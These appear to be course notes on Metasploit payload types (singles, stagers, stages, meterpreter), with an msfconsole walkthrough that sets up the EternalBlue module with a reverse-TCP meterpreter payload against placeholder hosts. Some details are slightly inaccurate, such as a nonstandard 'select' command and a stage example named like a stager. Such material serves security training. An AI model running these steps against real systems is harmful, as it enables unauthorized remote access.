Payloads

It is important to note that payloads and exploits HIGHLY depends on the target's environment, architecture. Etc since it is based on the return addresses of the functions and registers so at times we will be crafting our own.

Payloads

Defined as the code that gets executed to exploit a certain vulnerability. The exists three types of payloads in metasploit:

• Singles: windows/shell_bind_tcp, it contains the entire shellcode for the selected task, so they're more stable than the staged ones since they are all-in-one format which makes them heavier than other types of payloads.

• Stagers: windows/shell/bind_tcp, These work alongside stages, they are waiting on the attacker's machine to establish a connection to the victim host once the stage completes its task on the target. Small in size.

  • Faces a huge issue when dealing with NX bits and DEP measures.

  • Stagers that are NX-aware are bigger in size.

• Stages: windows/shell/bind_tcp, payload components that are loaded by the loader.

Staged Payloads

As mentioned earlier, they're an exploitation process that is decomposed and modularized to help in the segmentation of the exploitation in action to be less detectable and picked by AV or IPS. If all the stages work with no issues, the attacker will gain his beloved remote access.

The meterpreter payload for example uses DLL injection in order to ensure a communication with the target. Once we successfully infect the target, we see a meterpreter interface that looks like the msfconsole except that the commands that we will be executing are aimed at the target.

Searching, Selecting and using payloads

msf6 > select <exploit>

# Help of grep in identifying the desired payload:
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter show payloads
...
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep -c meterpreter show payloads 
...
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter grep reverse_tcp show payloads
...

# Setting the payload:
msf6 exploit(windows/smb/ms17_010_eternalblue) > grep meterpreter grep reverse_tcp show payloads
...
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload <Number Of Payload>
...

# After setting a payload we'll have to setup the options
msf6 exploit(**windows/smb/ms17_010_eternalblue**) > ifconfig
...
msf6 exploit(**windows/smb/ms17_010_eternalblue**) > set LHOST <our-ip>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <target-ip>
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
...
meterpreter > help
...

Payload	Description
generic/custom	Generic listener, multi-use
generic/shell_bind_tcp	Generic listener, multi-use, normal shell, TCP connection binding
generic/shell_reverse_tcp	Generic listener, multi-use, normal shell, reverse TCP connection
windows/x64/exec	Executes an arbitrary command (Windows x64)
windows/x64/loadlibrary	Loads an arbitrary x64 library path
windows/x64/messagebox	Spawns a dialog via MessageBox using a customizable title, text & icon
windows/x64/shell_reverse_tcp	Normal shell, single payload, reverse TCP connection
windows/x64/shell/reverse_tcp	Normal shell, stager + stage, reverse TCP connection
windows/x64/shell/bind_ipv6_tcp	Normal shell, stager + stage, IPv6 Bind TCP stager
windows/x64/meterpreter/$	Meterpreter payload + varieties above
windows/x64/powershell/$	Interactive PowerShell sessions + varieties above
windows/x64/vncinject/$	VNC Server (Reflective Injection) + varieties above

Other critical payloads that are heavily used by penetration testers during security assessments are Empire and Cobalt Strike payloads. These are not in the scope of this course, but feel free to research them in our free time as they can provide a significant amount of insight into how professional penetration testers perform their assessments on high-value targets.